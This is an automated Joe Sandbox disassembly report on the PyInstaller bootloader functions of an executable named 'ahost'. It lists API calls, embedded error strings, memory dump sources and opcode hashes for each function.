String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
Instruction ID: 998338be0356ef53edad8c5234d32c8da0b73fda9f7c5dc7afbe5a0bed39e020
Opcode Fuzzy Hash: e491f33a4545c5dc9e33b4da933e1c9d98f9a36929a11ac7b8a73595df86892f
Instruction Fuzzy Hash: 0C517511E2964342FB55BF25FC516BAE2B1AF94780FC44431D62E826EDEE2CF40583E1

Function 00007FF7F91E2180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

GetDC.USER32 ref: 00007FF7F91E21AB
SelectObject.GDI32 ref: 00007FF7F91E21F2
DrawTextW.USER32 ref: 00007FF7F91E2215
SelectObject.GDI32 ref: 00007FF7F91E222B
ReleaseDC.USER32 ref: 00007FF7F91E223B
MoveWindow.USER32 ref: 00007FF7F91E228B
MoveWindow.USER32 ref: 00007FF7F91E22CB
MoveWindow.USER32 ref: 00007FF7F91E231E
MoveWindow.USER32 ref: 00007FF7F91E2366

Strings

P%, xrefs: 00007FF7F91E21FF

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: MoveWindow$ObjectSelect$DrawReleaseText
String ID: P%
API String ID: 2147705588-2959514604
Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction ID: c36f94774f6ab4f024c77e6b184c67509492e4bd331c5dfa153205433277ec1a
Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
Instruction Fuzzy Hash: 6251C6266047A186DB34AF26A8181BEB7B1FB98B61F404135EBDF83694DF3CD145D720

Function 00007FF7F91E80B0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

GetWindowLongPtrW.USER32 ref: 00007FF7F91E80EF
GetWindowLongPtrW.USER32 ref: 00007FF7F91E816F
ShutdownBlockReasonCreate.USER32 ref: 00007FF7F91E8182
GetLastError.KERNEL32 ref: 00007FF7F91E818C
SetWindowLongPtrW.USER32 ref: 00007FF7F91E81A3

Strings

Needs to remove its temporary files., xrefs: 00007FF7F91E8175

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: LongWindow$BlockCreateErrorLastReasonShutdown
String ID: Needs to remove its temporary files.
API String ID: 3975851968-2863640275
Opcode ID: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction ID: 0d5e09195ada8f8de3e41a28db76bcfe6e00167d71bbc4f07f0f75b32d236e3d
Opcode Fuzzy Hash: 1b4b32be61da5f45784fe9fe2f7d724fb74bbaf2a32eb33803c40e4204126e7e
Instruction Fuzzy Hash: 10216721E09A4282FB957F7ABC5417DE270EF88B90F984171DA3E837ECDE2CD5548261

Function 00007FF7F91F6300 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 494COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F6343
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F6730
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F69CC

Strings

:, xrefs: 00007FF7F91F64FC
-, xrefs: 00007FF7F91F63D9
p, xrefs: 00007FF7F91F646D
f, xrefs: 00007FF7F91F6465
p, xrefs: 00007FF7F91F63F5

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: -$:$f$p$p
API String ID: 3215553584-2013873522
Opcode ID: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction ID: 3f16a011aafa4bf8f99b7e5f5abe6c6527e1760d4a1e3a758ce7a3956ad42edd
Opcode Fuzzy Hash: 75ce3dd5e90789a751ac91fed3db50e3550f512a2f4dec46f6fb30c565ad9a60
Instruction Fuzzy Hash: F8128362E0814F86FB247E14B954279F6B9FB50798FC84135D7B9466CCEB3CE5408BA0

Function 00007FF7F91F1038 Relevance: 14.5, APIs: 3, Strings: 5, Instructions: 475COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F1078
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F1440
_invalid_parameter_noinfo.LIBCMT ref: 00007FF7F91F16DF

Strings

f, xrefs: 00007FF7F91F12C5
f, xrefs: 00007FF7F91F117A
p, xrefs: 00007FF7F91F1182
p, xrefs: 00007FF7F91F111D
f, xrefs: 00007FF7F91F1110

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: f$f$p$p$f
API String ID: 3215553584-1325933183
Opcode ID: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction ID: f582ab8ce527e6209ae5e150f16bac7de49aaafc247ac72583af92d32b6401dc
Opcode Fuzzy Hash: efdc55b57c7b5823aa39a5abe82f144bbffe385c3037011f7a836833ec2ff017
Instruction Fuzzy Hash: E9128262E0C14B85FB30AE15B854679F271EB8176CFD84135D7B946ACCEB7CE4848BA0

Function 00007FF7F91E1050 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 119COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7F91E11F6
malloc, xrefs: 00007FF7F91E110F
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7F91E10CC
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF7F91E1108
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7F91E1098
fseek, xrefs: 00007FF7F91E10D3
fread, xrefs: 00007FF7F91E11FD

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 53d1e4d2edf0062f7230160cf0d8e608199b832438cf6a3aedd647e8abf4d892
Instruction ID: d863c14b0d52ecf5c9c908104776dedebb8e2306d4475c6314320dc060317d0e
Opcode Fuzzy Hash: 53d1e4d2edf0062f7230160cf0d8e608199b832438cf6a3aedd647e8abf4d892
Instruction Fuzzy Hash: A1413C21E0865682FB20FF25BC046B9A3A1AF44B84FD44431EE6E477D9DE3CF50187A1

Function 00007FF7F91E1470 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 107COMMON

Download Yara Rule

Strings

Failed to extract %s: failed to read data chunk!, xrefs: 00007FF7F91E15DF
malloc, xrefs: 00007FF7F91E151F
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF7F91E14DE
Failed to extract %s: failed to allocate data buffer (%u bytes)!, xrefs: 00007FF7F91E1518
Failed to extract %s: failed to open archive file!, xrefs: 00007FF7F91E149F
fseek, xrefs: 00007FF7F91E14E5
fread, xrefs: 00007FF7F91E15E6

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to extract %s: failed to allocate data buffer (%u bytes)!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$fread$fseek$malloc
API String ID: 2050909247-3659356012
Opcode ID: 9c0a33a636d22d269d029a952bcb6a186b4f055325f6749c3ab7856a71983fc4
Instruction ID: e9e12ab08463cda390116e236c683fadd9e20ed62b8bef6d5921ca872d575994
Opcode Fuzzy Hash: 9c0a33a636d22d269d029a952bcb6a186b4f055325f6749c3ab7856a71983fc4
Instruction Fuzzy Hash: 3C414021E0864686FB20FF21A8415B9A3A0AF45794FC44532EE6E477DDDE3CF5418BA1

Function 00007FF7F91EEA78 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF7F91EEAD5

Part of subcall function 00007FF7F91EFA2C: __GetUnwindTryBlock.LIBCMT ref: 00007FF7F91EFA6F
Part of subcall function 00007FF7F91EFA2C: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF7F91EFA94

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF7F91EEBAD
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF7F91EEDFB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF7F91EEF08

Strings

csm, xrefs: 00007FF7F91EEB56
csm, xrefs: 00007FF7F91EEAEF
csm, xrefs: 00007FF7F91EEBD0

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction ID: 5bb8beb5652ff88e3a8c2e704395b0bc10e311342c33df1e193f6f55d6a44f28
Opcode Fuzzy Hash: b3973e9ed2b821368333a922871466498bda8290f9160b5e7eff6497ccad0325
Instruction Fuzzy Hash: B8D16C22E0864187EB21BF65A8403AEA7B0FB45788F940135EE5D57BD9DF78F090C792

Function 00007FF7F91E2C50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F91E3706,?,00007FF7F91E3804), ref: 00007FF7F91E2C9E
FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF7F91E3706,?,00007FF7F91E3804), ref: 00007FF7F91E2D63
MessageBoxW.USER32 ref: 00007FF7F91E2D99

Strings

<FormatMessageW failed.>, xrefs: 00007FF7F91E2D70
Error, xrefs: 00007FF7F91E2D8C
[PYI-%d:ERROR] , xrefs: 00007FF7F91E2CA6
%ls: , xrefs: 00007FF7F91E2D22

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Message$CurrentFormatProcess
String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
API String ID: 3940978338-251083826
Opcode ID: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction ID: 968e6561d5ca9252b9187ce52e3381e71b3dcd33bc4c7334633531accefcc7f5
Opcode Fuzzy Hash: 5cbcdbf458937bec5e084182eea0cc5ea1ed3b872b1d9e6a561cbd57b4752a27
Instruction Fuzzy Hash: 1831B722B0864142FB20BF15BC146AAA6A5BF88798F800135EF5E937ADDE3CE546C350

Function 00007FF7F91EDD38 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,?,00007FF7F91EDFEA,?,?,?,00007FF7F91EDCDC,?,?,?,00007FF7F91ED8D9), ref: 00007FF7F91EDDBD
GetLastError.KERNEL32(?,?,?,00007FF7F91EDFEA,?,?,?,00007FF7F91EDCDC,?,?,?,00007FF7F91ED8D9), ref: 00007FF7F91EDDCB
LoadLibraryExW.KERNEL32(?,?,?,00007FF7F91EDFEA,?,?,?,00007FF7F91EDCDC,?,?,?,00007FF7F91ED8D9), ref: 00007FF7F91EDDF5
FreeLibrary.KERNEL32(?,?,?,00007FF7F91EDFEA,?,?,?,00007FF7F91EDCDC,?,?,?,00007FF7F91ED8D9), ref: 00007FF7F91EDE63
GetProcAddress.KERNEL32(?,?,?,00007FF7F91EDFEA,?,?,?,00007FF7F91EDCDC,?,?,?,00007FF7F91ED8D9), ref: 00007FF7F91EDE6F

Strings

api-ms-, xrefs: 00007FF7F91EDDDD

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction ID: 32449817985e2651eab51535a801100a84499cb2a7a6ef47191ce9990a40117f
Opcode Fuzzy Hash: 7dacba43e0eeea41cb86842b35fa5572bc178a215ab50afad80fbb9160df823c
Instruction Fuzzy Hash: 9E318125F1A60686EF61BF02BD04565A3A4BF54BA0F8A4535ED3D473D8DF3CF44882A1

Function 00007FF7F91E6350 Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 82COMMON

Download Yara Rule

Strings

LoadLibrary, xrefs: 00007FF7F91E649E
Path of ucrtbase.dll (%s) and its name exceed buffer size (%d), xrefs: 00007FF7F91E63F7
Failed to load Python DLL '%ls'., xrefs: 00007FF7F91E6497
ucrtbase.dll, xrefs: 00007FF7F91E63CD
Path of Python shared library (%s) and its name (%s) exceed buffer size (%d), xrefs: 00007FF7F91E6446
Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d), xrefs: 00007FF7F91E63B7

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to load Python DLL '%ls'.$LoadLibrary$Path of Python shared library (%s) and its name (%s) exceed buffer size (%d)$Path of ucrtbase.dll (%s) and its name exceed buffer size (%d)$Reported length (%d) of Python shared library name (%s) exceeds buffer size (%d)$ucrtbase.dll
API String ID: 2050909247-2434346643
Opcode ID: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
Instruction ID: 402d2aa6ff56c8e95c932c549241a57d5b5cb113419b88899dc7a8fd74ebe2e2
Opcode Fuzzy Hash: 5c7507e70d60f0fb7e3c9a3209df06ed2678ab3c183624e845013dd92edd1fac
Instruction Fuzzy Hash: E0413961E0868692EB15FF24F8142E9A371BB54380FC00132EA6D436D9EE3CF615C3A1

Function 00007FF7F91E2A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF7F91E351A,?,00000000,00007FF7F91E3F23), ref: 00007FF7F91E2AA0

Strings

Warning [ANSI Fallback], xrefs: 00007FF7F91E2B0F
0, xrefs: 00007FF7F91E2B16
[PYI-%d:%s] , xrefs: 00007FF7F91E2AA8
WARNING, xrefs: 00007FF7F91E2AAF
Warning, xrefs: 00007FF7F91E2B1E

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: CurrentProcess
String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
API String ID: 2050909247-2900015858
Opcode ID: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction ID: 1a99fab6e1f5fd11ff65ec8fe9c775221bb2b1cc97259773eb1a6d0d69708f47
Opcode Fuzzy Hash: 2c88a21be5af21f56a68c86fdca39687fee9058fd376c6caa55945c458c4d180
Instruction Fuzzy Hash: 5A217132A1878182E760EF51BC817EAA3A4BB88784F800135FE9D9369DDF3CE5458690

Function 00007FF7F91FB1C0 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF7F91FB1CF
FlsGetValue.KERNEL32 ref: 00007FF7F91FB1E4
FlsSetValue.KERNEL32 ref: 00007FF7F91FB205
FlsSetValue.KERNEL32 ref: 00007FF7F91FB232
FlsSetValue.KERNEL32 ref: 00007FF7F91FB243
FlsSetValue.KERNEL32 ref: 00007FF7F91FB254
SetLastError.KERNEL32 ref: 00007FF7F91FB26F

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
Instruction ID: 05fed30dbe833381ccbe02d857a0200d849fcf7b0633491a18c86575560cce8f
Opcode Fuzzy Hash: 95e941e89c228e9c604249a81e4247bf93b8921c3316e711f137cef7aac77c3c
Instruction Fuzzy Hash: 67214A20E4D20A81FB697B617E5517DD1625F447A8F844734EA3E46ADEFE2CB44183A0

Function 00007FF7F9207DDC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF7F9207E0D
GetLastError.KERNEL32 ref: 00007FF7F9207E19
CloseHandle.KERNEL32 ref: 00007FF7F9207E31
CreateFileW.KERNEL32 ref: 00007FF7F9207E5C
WriteConsoleW.KERNEL32 ref: 00007FF7F9207E7B

Strings

CONOUT$, xrefs: 00007FF7F9207E3D

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction ID: b72d8efe116fff7854f8dfb090243b2208da0b1ae41ccade25083cd16c399444
Opcode Fuzzy Hash: 5493e4d9a44aaf731d1a805f3958d18bb0ed212be4b6a830fa2bcaabe5bc997c
Instruction Fuzzy Hash: 58114221A18A4186F7A0AF52BC54329A6B4BB88BF4F444234D96EC77E8DF7CD8548790

Function 00007FF7F91E8560 Relevance: 9.1, APIs: 6, Instructions: 127COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00000000,00007FF7F91E9216), ref: 00007FF7F91E8592
K32EnumProcessModules.KERNEL32(?,?,00000000,00007FF7F91E9216), ref: 00007FF7F91E85E9

Part of subcall function 00007FF7F91E9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7F91E45E4,00000000,00007FF7F91E1985), ref: 00007FF7F91E9439

K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7F91E9216), ref: 00007FF7F91E8678
K32GetModuleFileNameExW.KERNEL32(?,?,00000000,00007FF7F91E9216), ref: 00007FF7F91E86E4
FreeLibrary.KERNEL32(?,?,00000000,00007FF7F91E9216), ref: 00007FF7F91E86F5
FreeLibrary.KERNEL32(?,?,00000000,00007FF7F91E9216), ref: 00007FF7F91E870A

Memory Dump Source

Source File: 00000000.00000002.1888249997.00007FF7F91E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7F91E0000, based on PE: true

Associated: 00000000.00000002.1888207454.00007FF7F91E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888318564.00007FF7F920B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F921E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888423514.00007FF7F9222000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1888736537.00007FF7F9224000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7f91e0000_ahost.jbxd

Similarity

API ID: FileFreeLibraryModuleNameProcess$ByteCharCurrentEnumModulesMultiWide
String ID:
API String ID: 3462794448-0
Opcode ID: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
Instruction ID: 856e9de2e189ec67eea4b59b7388828ee85c9f9729d418881b56b6d1d16c882c
Opcode Fuzzy Hash: b52d66e3f6483ee012b3a88bb9869cc1030523c4b2827b1d8d4a1b21ae680e9c
Instruction Fuzzy Hash: FB418162F1968242EB34BF11BD406AAA2A4FF88BC4F840175DE6D57BCDDE3CE4018765

Function 00007FF7F91FB338 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF7F91F4F81,?,?,?,?,00007FF7F91FA4FA,?,?,?,?,00007FF7F91F71FF), ref: 00007FF7F91FB347
